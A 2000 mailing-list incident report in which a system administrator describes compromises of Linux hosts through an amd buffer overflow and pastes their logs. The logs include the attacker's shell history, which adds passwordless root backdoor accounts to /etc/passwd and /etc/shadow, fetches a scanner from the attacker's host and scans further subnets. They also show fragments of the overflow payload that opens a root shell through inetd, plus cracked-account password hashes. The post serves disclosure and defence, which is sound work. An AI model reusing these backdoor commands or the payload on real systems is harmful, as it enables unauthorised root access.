Security Incidents mailing list archives
Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167]
From: truth () ICHAOS COM (Thomas E. Ruth)
Date: Fri, 7 Jan 2000 14:20:25 -0700
I just learned that the other IP that appears in the logs (from psi.net) is the account the cracker uses when he doesn't use his cablemodem. Thomas Ruth UNIX System Administrator Qwest Communications "Thomas E. Ruth" wrote:
The attacker from this IP address is using an RPC scanner to search for versions of amd that has a buffer overflow, and exploiting it. They are then using the exploited systems to scan other subnets and exploit those systems, etc. etc. etc.. My system was used as one of these launch points to get in to at least 2 other systems, one of which got destroyed. User is known to be found on irc.efnet.org using the alias "dap" and hangs out on #bifemunix frequently. Here are some log files of the incident: One of the effected systems: messages.1 Dec 29 22:52:01 zenith Dec 29 22:52:01 zenith syslogd: Cannot glue message parts together Dec 29 22:52:01 zenith 27>Dec 29 22:52:01 amd[462]: amq requested mount of null)/0) Dec 29 22:52:01 zenith p/h;/usr/sbin/inetd /tmp/h &# Dec 29 22:52:03 zenith PAM_pwdb[32202]: (su) session closed for user root Dec 29 22:52:04 zenith PAM_pwdb[32315]: (su) session closed for user root Dec 29 22:53:55 zenith PAM_pwdb[23940]: password for (dap/69) changed by ((null)/0) Dec 29 22:54:02 zenith PAM_pwdb[23941]: password for (dapper/0) changed by ((null)/0) Dec 29 23:14:35 zenith PAM_pwdb[24143]: password for (joe/23) changed by ((null)/0) Dec 29 23:15:04 zenith PAM_pwdb[24148]: password for (black/0) changed by ((null)/0) Dec 29 23:18:28 zenith PAM_pwdb[24174]: (login) session opened for user joe by (uid=0) Dec 29 23:19:22 zenith PAM_pwdb[24174]: (login) session closed for user joe Dec 29 23:28:41 zenith PAM_pwdb[24250]: password for (black/0) changed by ((null)/0) Dec 29 23:29:06 zenith PAM_pwdb[24257]: password for (black/0) changed by ((null)/0) Dec 29 23:29:52 zenith PAM_pwdb[24264]: (login) session opened for user joe by (uid=0) Dec 29 23:30:05 zenith PAM_pwdb[24264]: (login) session closed for user joe Dec 29 23:32:05 zenith PAM_pwdb[24295]: password for (joe/23) changed by ((null)/0) Dec 29 23:32:30 zenith PAM_pwdb[24298]: password for (black/0) changed by ((null)/0) Jan 1 07:42:16 zenith PAM_pwdb[12480]: (login) session opened for user dap by (uid=0) Jan 1 07:42:20 zenith PAM_pwdb[12492]: (su) session opened for user dapper by dap(uid=69) Jan 1 07:43:43 zenith modprobe: can't locate module binfmt-0008 Jan 1 07:43:43 zenith modprobe: can't locate module binfmt-0008 Jan 1 07:47:19 zenith PAM_pwdb[12492]: (su) session closed for user dapper Jan 1 07:47:20 zenith PAM_pwdb[12480]: (login) session closed for user dap Dec 29 23:16:17 zenith in.telnetd[24159]: connect from 63.225.116.129 Dec 29 23:18:16 zenith in.telnetd[24171]: connect from 63.225.116.129 Dec 29 23:18:28 zenith login: LOGIN ON 4 BY joe FROM mail.multifin.com Dec 29 23:29:42 zenith in.telnetd[24263]: connect from 63.225.116.129 Dec 29 23:29:52 zenith login: LOGIN ON 4 BY joe FROM mail.multifin.com Jan 1 07:42:10 zenith in.telnetd[12479]: connect from 24.112.41.167 Jan 1 07:42:16 zenith login: LOGIN ON 7 BY dap FROM cr595282-a.hnsn1.on.wave.home.com Jan 1 07:46:45 zenith in.telnetd[12576]: connect from 127.0.0.1 Jan 1 07:47:20 zenith pam_console[12480]: getpwnam failed for dap .root_bash_history - the commands he/she used uname -a; pwd; echo "dap::69:100::/tmp:/bin/sh" >> /etc/passwd; echo "dap::::::::" >> /etc/shadow; echo "dapper::0:0::/tmp:/bin/sh" >> /etc/passwd; echo "dapper::::::::" >> /etc/shadow; passwd dap passwd dapper exit uname -a; pwd; echo "joe::23:100:black,,,:/:/bin/sh" >> /etc/passwd; echo "joe::::::::" >> /etc/shadow; passwd joe echo "black::0:0::/:/bin/sh" >> /etc/passwd; echo "black::::::::" >> /etc/shadow; passwd black exit uname -a; pwd; echo "joe::23:100:black,,,:/:/bin/sh" >> /etc/passwd; echo "joe::::::::" >> /etc/shadow; passwd black echo "black::0:0::/:/bin/sh" >> /etc/passwd; echo "black::::::::" >> /etc/shadow; passwd black ls exit uname -a; pwd; echo "joe::23:100:black,,,:/:/bin/sh" >> /etc/passwd; echo "joe::::::::" >> /etc/shadow; passwd joe echo "black::0:0::/:/bin/sh" >> /etc/passwd; echo "black::::::::" >> /etc/shadow; passwd black exit uname -a; pwd; cat /etc/passwd |grep dap exit; uname -a; pwd; cat /etc/passwd |grep dap exit uname -a; pwd; exit uname -a; pwd; exit uname -a; pwd; cat /etc/passwd |grep dap cat /etc/passwd |grep joe cd /home/ ls cd /home/ ls cd kate ls cd .. cd todd ls cd .. ls cd pager ls cd .. ls cd tmc ls cd .. cd ls ls cd kate ls f ls id uname -a exit; cd /tmp (jan 1st ish) cd /usr/.../ mkdir /usr/.../ cd /usr/.../ ls ftp 24.112.41.167 ls tar -zxvf 4mdsk4n-v0.1.tar.gz mv 4mdsk4n-v0.1/ amdscan/ ls rm *.gz cd amdscan ls mv 4mdsk4n-i386-linux amds chmod +x amds ./amds ls ls ./amds -o outfile 207.168 ./amds -o outfile 207.167 exit CRACKER'S ADDITION TO MY PASSWORD FILE dap:$1$Rv.2Td1q$DQLXDhxAa9MP17qs.joiD/:10955:-1:-1:-1:-1:-1:134538300 dapper:$1$b2.QOLS2$un.hyVhpSuh9kMt/yr6mT1:10955:-1:-1:-1:-1:-1:134538300 joe:!$1$u7vD0D0N$FJU5Wpla7lQYbRMzdkBWp.:10955:-1:-1:-1:-1:-1:134530828 black:!$1$yugI3kQm$ydXiz5i7CkXSjTc/1a46F0:10955:-1:-1:-1:-1:-1:134530828 joe:::::::: black:::::::: joe:::::::: black:::::::: -------------------------------------------------------------------- Another effected system: Subject: lastlog dap pts/7 Thu Dec 30 21:20 - 21:49 (00:29) cr595282-a.hnsn1.on.wave.home.com issp pts/7 Thu Dec 30 20:16 - 21:15 (00:59) ip85.toronto25.dialup.canada.psi.net issp pts/9 Thu Dec 30 19:58 - 21:48 (01:49) ip222.toronto6.dialup.canada.psi.net issp pts/7 Thu Dec 30 19:48 - 20:11 (00:22) ip222.toronto6.dialup.canada.psi.net issp pts/7 Thu Dec 30 16:08 - 16:08 (00:00) ip213.toronto6.dialup.canada.psi.net issp pts/7 Thu Dec 30 15:42 - 15:57 (00:14) ip213.toronto6.dialup.canada.psi.net issp pts/7 Thu Dec 30 12:13 - 14:51 (02:37) ip213.toronto6.dialup.canada.psi.net issp pts/4 Thu Dec 30 11:56 - 16:07 (04:11) ip213.toronto6.dialup.canada.psi.net issp pts/7 Wed Dec 29 21:59 - 23:21 (01:21) ip51.toronto27.dialup.canada.psi.net issp ftp Wed Dec 29 21:38 - 21:53 (00:15) ip51.toronto27.dialup.canada.psi.net issp pts/4 Wed Dec 29 21:35 - 23:21 (01:46) ip51.toronto27.dialup.canada.psi.net dap pts/12 Tue Dec 28 01:25 - 01:28 (00:02) sponge.gaffa.com issp pts/12 Mon Dec 27 18:45 - 18:47 (00:01) ip216.toronto8.dialup.canada.psi.net dap pts/12 Mon Dec 27 16:16 - 16:19 (00:02) cr595282-a.hnsn1.on.wave.home.com joe pts/12 Mon Dec 27 16:09 - 16:16 (00:07) cr595282-a.hnsn1.on.wave.home.com joe pts/11 Mon Dec 27 16:09 - 16:09 (00:00) cr595282-a.hnsn1.on.wave.home.com joe pts/11 Mon Dec 27 15:48 - 15:51 (00:03) ip107.toronto6.dialup.canada.psi.net joe pts/11 Mon Dec 27 15:47 - 15:47 (00:00) freaker.gaffa.com messages: Dec 27 15:44:16 happy Dec 27 15:44:16 happy syslogd: Cannot glue message parts together Dec 27 15:44:16 happy 27>Dec 27 15:44:16 amd[594]: amq requested mount of ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????ë(^?^^P?^^fÃ^H?^^DfÃ^C?^^Hfë^K?^N?Ê3À?F^L^F^W^F^Z°^KÍ?èÓÿÿÿ18 Jan 1998--str/bin/sh(-c)/bin/echo! '2222 stream tcp nowait root /bin/sh s Dec 27 15:44:16 happy p/h;/usr/sbin/inetd /tmp/h &#?Òòÿ¿Òòÿ¿^C Dec 27 15:45:08 happy PAM_pwdb[16359]: password for (joe/23) changed by ((null)/0) Dec 27 15:45:45 happy PAM_pwdb[16362]: password for (black/0) changed by ((null)/0) Dec 27 15:47:01 happy PAM_pwdb[16370]: (login) session opened for user joe by (uid=0) Dec 27 15:47:10 happy PAM_pwdb[16384]: (su) session opened for user black by joe(uid=23) Dec 27 15:47:24 happy PAM_pwdb[16384]: (su) session closed for user black Dec 27 15:47:26 happy PAM_pwdb[16370]: (login) session closed for user joe Dec 27 15:48:09 happy PAM_pwdb[16392]: check pass; user unknown Dec 27 15:48:09 happy login[16392]: FAILED LOGIN 1 FROM ip107.toronto6.dialup.canada.psi.net FOR hd, User not known to the underlying authentication module Dec 27 15:48:12 happy PAM_pwdb[16392]: (login) session opened for user joe by (uid=0) Dec 27 15:48:49 happy PAM_pwdb[16407]: 1 authentication failure; joe(uid=23) -> sblanchard for su service Dec 27 15:48:54 happy PAM_pwdb[16408]: (su) session opened for user black by joe(uid=23) Dec 27 15:51:23 happy PAM_pwdb[16408]: (su) session closed for user black Dec 27 15:51:25 happy PAM_pwdb[16392]: (login) session closed for user joe Dec 27 16:09:08 happy PAM_pwdb[16498]: (login) session opened for user joe by (uid=0) Dec 27 16:09:16 happy kernel: nfs: server pid594@happy:/net not responding, still trying Dec 27 16:09:31 happy PAM_pwdb[16518]: (login) session opened for user joe by (uid=0) Dec 27 16:09:52 happy PAM_pwdb[16537]: (su) session opened for user black by joe(uid=23) Dec 27 16:10:08 happy PAM_pwdb[16539]: password for (joe/23) changed by (joe/0) Dec 27 16:10:23 happy PAM_pwdb[16550]: password for (black/0) changed by (joe/0) Dec 27 16:16:26 happy PAM_pwdb[16563]: password for (dap/69) changed by (joe/0) Dec 27 16:16:40 happy PAM_pwdb[16564]: password for (dapper/0) changed by (joe/0) Dec 27 16:16:52 happy PAM_pwdb[16537]: (su) session closed for user black Dec 27 16:16:53 happy PAM_pwdb[16518]: (login) session closed for user joe Dec 27 16:16:57 happy PAM_pwdb[16567]: (login) session opened for user dap by (uid=0) Dec 27 16:17:15 happy PAM_pwdb[16582]: (su) session opened for user dapper by dap(uid=69) Dec 27 16:19:17 happy PAM_pwdb[16582]: (su) session closed for user dapper Dec 27 16:19:18 happy PAM_pwdb[16567]: (login) session closed for user dap Dec 27 17:04:07 happy PAM_pwdb[15181]: (su) session closed for user root Dec 27 17:07:33 happy PAM_pwdb[16765]: (su) session opened for user root by truth(uid=500) Dec 27 17:34:36 happy login: FAILED LOGIN 1 FROM ip216.toronto8.dialup.canada.psi.net FOR joe, Authentication failure Dec 27 18:40:02 happy login: FAILED LOGIN 1 FROM supper.ma.ultranet.com FOR joe, Authentication failure Dec 27 18:41:14 happy PAM_pwdb[17069]: password for (issp/56) changed by ((null)/0) Dec 27 18:45:14 happy PAM_pwdb[17075]: (login) session opened for user issp by (uid=0) Dec 27 18:45:27 happy PAM_pwdb[17089]: get passwd; pwdb: structure is no longer valid Dec 27 18:46:57 happy PAM_pwdb[17093]: password for (tssp/0) changed by ((null)/0) Dec 27 18:47:06 happy PAM_pwdb[17094]: (su) session opened for user tssp by issp(uid=56) Dec 27 18:47:11 happy PAM_pwdb[17094]: (su) session closed for user tssp Dec 27 18:47:13 happy PAM_pwdb[17075]: (login) session closed for user issp Dec 28 01:25:51 happy PAM_pwdb[17751]: (login) session opened for user dap by (uid=0) Dec 28 01:28:37 happy PAM_pwdb[17751]: (login) session closed for user dap Dec 28 04:02:13 happy kernel: nfs: task 1527 can't get a request slot Dec 28 09:00:00 happy last message repeated 8 times Dec 28 11:40:04 happy last message repeated 8 times Dec 28 11:50:30 happy last message repeated 8 times Dec 28 13:00:01 happy last message repeated 8 times Dec 28 14:00:00 happy last message repeated 8 times Dec 28 14:10:00 happy last message repeated 2 times Dec 28 14:10:04 happy last message repeated 4 times Dec 28 15:38:26 happy PAM_pwdb[21366]: (login) session opened for user truth by (uid=0) Dec 28 15:50:57 happy PAM_pwdb[21366]: (login) session closed for user truth Dec 28 17:18:11 happy PAM_pwdb[15434]: (su) session closed for user root Dec 28 17:25:31 happy PAM_pwdb[16765]: (su) session closed for user root Dec 29 04:02:13 happy kernel: nfs: task 1528 can't get a request slot Dec 29 14:10:11 happy amd[25978]: AM-UTILS VERSION INFORMATION: Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1997-1998 Erez Zadok Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1990 Jan-Simon Pendry Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1990 Imperial College of Science, Technology & Medicine Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1990 The Regents of the University of California. Dec 29 14:10:11 happy amd[25978]: am-utils version 6.0 (build 1). Dec 29 14:10:11 happy amd[25978]: Built by root () porky devel redhat com on date Thu Apr 8 13:25:28 EDT 1999. Dec 29 14:10:11 happy amd[25978]: cpu=i686 (little-endian), arch=i386, karch=i686. Dec 29 14:10:11 happy amd[25978]: full_os=linux, os=linux, osver=2.2.1-ac1, vendor=pc. Dec 29 14:10:11 happy amd[25978]: Map support for: root, passwd, union, nisplus, nis, ndbm, file, error. Dec 29 14:10:11 happy amd[25978]: AMFS: nfs, link, nfsx, nfsl, host, linkx, program, union, inherit, Dec 29 14:10:11 happy amd[25978]: ufs, cdfs, pcfs, auto, direct, toplvl, autofs, error. Dec 29 14:10:11 happy amd[25978]: FS: autofs, isofs, nfs, vfat, ext2. Dec 29 14:10:11 happy amd[25978]: Network 1: wire="10.161.251.0" (netnumber=10.161.251). Dec 29 14:10:11 happy amd[25978]: Network 2: wire="197.100.100.0" (netnumber=197.100.100). Dec 29 14:10:11 happy amd[25978]: Network 3: wire="206.60.125.0" (netnumber=206.60.125). Dec 29 14:10:11 happy amd[25978]: Network 4: wire="10.161.251.0" (netnumber=10.161.251). Dec 29 14:10:11 happy amd[25978]: Network 5: wire="10.161.251.0" (netnumber=10.161.251). Dec 29 14:10:11 happy amd[25978]: Network 6: wire="63.225.116.128" (netnumber=63.225.116.128). Dec 29 14:10:11 happy amd[25978]: My ip addr is 0xaa1fb14 Dec 29 14:10:11 happy amd[25979]: released controlling tty using setsid() Dec 29 14:10:11 happy amd[25979]: creating autofs service listener Dec 29 14:10:11 happy amd[25979]: file server localhost type local starts up Dec 29 14:10:11 happy amd: amd startup succeeded Dec 29 14:10:23 happy kernel: nfs: task 1529 can't get a request slot Dec 29 21:35:14 happy PAM_pwdb[27643]: (login) session opened for user issp by (uid=0) Dec 29 21:35:21 happy PAM_pwdb[27657]: (su) session opened for user tssp by issp(uid=56) Dec 29 21:38:04 happy ftpd[27664]: FTP LOGIN FROM ip51.toronto27.dialup.canada.psi.net [154.11.84.51], issp Dec 29 21:38:17 happy kernel: nfs: task 1530 can't get a request slot Dec 29 21:53:08 happy ftpd[27664]: FTP session closed Dec 29 21:54:59 happy kernel: sscan uses obsolete (PF_INET,SOCK_PACKET) Dec 29 21:54:59 happy modprobe: can't locate module `úÿ¿à Dec 29 21:54:59 happy modprobe: can't locate module ?úÿ¿à Dec 29 21:55:12 happy modprobe: can't locate module `úÿ¿à Dec 29 21:55:12 happy modprobe: can't locate module ?úÿ¿à Dec 29 21:55:34 happy modprobe: can't locate module `úÿ¿à Dec 29 21:55:34 happy modprobe: can't locate module ?úÿ¿à Dec 29 21:55:51 happy modprobe: can't locate module `úÿ¿à Dec 29 21:55:51 happy modprobe: can't locate module ?úÿ¿à Dec 29 21:59:43 happy login: FAILED LOGIN 1 FROM ip51.toronto27.dialup.canada.psi.net FOR joe, Authentication failure Dec 29 21:59:46 happy PAM_pwdb[27931]: (login) session opened for user issp by (uid=0) Dec 29 21:59:49 happy PAM_pwdb[27961]: (su) session opened for user tssp by issp(uid=56) Dec 29 23:21:13 happy PAM_pwdb[27961]: (su) session closed for user tssp Dec 29 23:21:15 happy PAM_pwdb[27931]: (login) session closed for user issp Dec 29 23:21:15 happy PAM_pwdb[27931]: 1 authentication failure; (uid=0) -> joe for login service Dec 29 23:21:54 happy PAM_pwdb[27657]: (su) session closed for user tssp Dec 29 23:21:55 happy PAM_pwdb[27643]: (login) session closed for user issp Dec 30 04:02:13 happy kernel: nfs: task 1531 can't get a request slot Dec 30 08:10:06 happy last message repeated 3 times Dec 30 11:10:01 happy last message repeated 2 times Dec 30 11:56:24 happy login: FAILED LOGIN 1 FROM ip213.toronto6.dialup.canada.psi.net FOR joe, Authentication failure Dec 30 11:56:26 happy PAM_pwdb[31581]: (login) session opened for user issp by (uid=0) Dec 30 11:56:33 happy PAM_pwdb[31595]: (su) session opened for user tssp by issp(uid=56) Dec 30 12:13:52 happy PAM_pwdb[31745]: (login) session opened for user issp by (uid=0) Dec 30 12:13:59 happy PAM_pwdb[31834]: (su) session opened for user tssp by issp(uid=56) Dec 30 14:00:01 happy last message repeated 2 times Dec 30 14:51:37 happy PAM_pwdb[31834]: (su) session closed for user tssp Dec 30 14:51:39 happy PAM_pwdb[31745]: (login) session closed for user issp Dec 30 15:42:47 happy PAM_pwdb[10377]: (login) session opened for user issp by (uid=0) Dec 30 15:43:05 happy PAM_pwdb[10394]: (su) session opened for user tssp by issp(uid=56) Dec 30 15:57:06 happy PAM_pwdb[10394]: (su) session closed for user tssp Dec 30 15:57:12 happy PAM_pwdb[10377]: (login) session closed for user issp Dec 30 16:04:34 happy PAM_pwdb[31595]: (su) session closed for user tssp Dec 30 16:05:10 happy PAM_pwdb[10541]: (su) session opened for user tssp by issp(uid=56) Dec 30 16:08:08 happy kernel: nfs: task 1532 can't get a request slot Dec 30 16:08:41 happy PAM_pwdb[10549]: (login) session opened for user issp by (uid=0) Dec 30 19:48:19 happy login: FAILED LOGIN 1 FROM ip222.toronto6.dialup.canada.psi.net FOR joe, Authentication failure Dec 30 19:48:24 happy PAM_pwdb[11145]: (login) session opened for user issp by (uid=0) Dec 30 19:49:15 happy PAM_pwdb[11162]: (su) session opened for user tssp by issp(uid=56) Dec 30 19:58:37 happy PAM_pwdb[11197]: (login) session opened for user issp by (uid=0) Dec 30 19:58:41 happy PAM_pwdb[11317]: (su) session opened for user tssp by issp(uid=56) Dec 30 20:11:12 happy PAM_pwdb[11162]: (su) session closed for user tssp Dec 30 20:16:11 happy PAM_pwdb[14202]: (login) session opened for user issp by (uid=0) Dec 30 20:16:15 happy PAM_pwdb[14216]: (su) session opened for user tssp by issp(uid=56) Dec 30 21:04:15 happy telnetd[14366]: ttloop: peer died: Invalid or incomplete multibyte or wide character Dec 30 21:15:26 happy PAM_pwdb[14216]: (su) session closed for user tssp Dec 30 21:15:28 happy PAM_pwdb[14202]: (login) session closed for user issp Dec 30 21:20:03 happy PAM_pwdb[14432]: (login) session opened for user dap by (uid=0) Dec 30 21:22:09 happy PAM_pwdb[14520]: (su) session opened for user dapper by dap(uid=69) Dec 30 21:27:15 happy PAM_pwdb[14546]: (su) session opened for user tssp by dap(uid=0) Dec 30 21:48:31 happy PAM_pwdb[11317]: (su) session closed for user tssp Dec 31 04:02:13 happy kernel: nfs: task 1533 can't get a request slot Dec 31 10:07:27 happy last message repeated 17 times Dec 31 12:24:19 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:19 happy kernel: RPC: task of released request still queued! Dec 31 12:24:19 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:19 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:20 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:20 happy kernel: RPC: task of released request still queued! Dec 31 12:24:20 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:20 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:20 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:20 happy kernel: RPC: task of released request still queued! Dec 31 12:24:20 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:20 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:21 happy amd[25979]: /net: mount (amfs_auto_cont): Connection refused Dec 31 12:24:21 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:21 happy kernel: RPC: task of released request still queued! Dec 31 12:24:21 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:21 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:22 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:22 happy kernel: RPC: task of released request still queued! Dec 31 12:24:22 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:22 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:23 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:23 happy kernel: RPC: task of released request still queued! Dec 31 12:24:23 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:23 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:24 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:24 happy kernel: RPC: task of released request still queued! Dec 31 12:24:24 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:24 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:25 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:25 happy kernel: RPC: task of released request still queued! Dec 31 12:24:25 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:25 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:24:26 happy kernel: nfs: RPC call returned error 111 Dec 31 12:24:26 happy kernel: RPC: task of released request still queued! Dec 31 12:24:26 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:24:26 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:26:40 happy kernel: nfs: RPC call returned error 111 Dec 31 12:26:40 happy kernel: RPC: task of released request still queued! Dec 31 12:26:40 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:26:40 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:26:40 happy kernel: nfs: RPC call returned error 111 Dec 31 12:26:40 happy kernel: RPC: task of released request still queued! Dec 31 12:26:40 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:26:40 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:26:41 happy kernel: nfs: RPC call returned error 111 Dec 31 12:26:41 happy kernel: RPC: task of released request still queued! Dec 31 12:26:41 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:26:41 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:26:42 happy kernel: nfs: RPC call returned error 111 Dec 31 12:26:42 happy kernel: RPC: task of released request still queued! Dec 31 12:26:42 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:26:42 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 12:41:42 happy kernel: nfs: RPC call returned error 111 Dec 31 12:41:42 happy kernel: RPC: task of released request still queued! Dec 31 12:41:42 happy kernel: RPC: (task is on xprt_pending) Dec 31 12:41:42 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 Dec 31 13:42:02 happy kernel: nfs: RPC call returned error 111 Dec 31 13:42:02 happy kernel: RPC: task of released request still queued! Dec 31 13:42:02 happy kernel: RPC: (task is on xprt_pending) Dec 31 13:42:02 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111 ------------------------------------------------------------------- Patch your AMD's!! Thomas Ruth UNIX System Administrator
Current thread:
- Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Thomas E. Ruth (Jan 06)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Jeffrey Papen (Jan 07)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Thomas E. Ruth (Jan 07)
- <Possible follow-ups>
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Maniac . (Jan 07)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Thomas E. Ruth (Jan 07)
- Cable modem hosts being exploited to spam. TCP ports 224, 253 Aaron Higbee (Jan 07)
- Probe from NS2.SOHONET.COM Jonathan S. Keim (Jan 08)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Missouri FreeNet Administration (Jan 10)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Thomas Molina (Jan 11)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Andrew Kunz (Jan 11)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Thomas E. Ruth (Jan 07)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Andy David (Jan 10)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Maniac . (Jan 11)
- Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167] Maniac . (Jan 11)
(Thread continues...)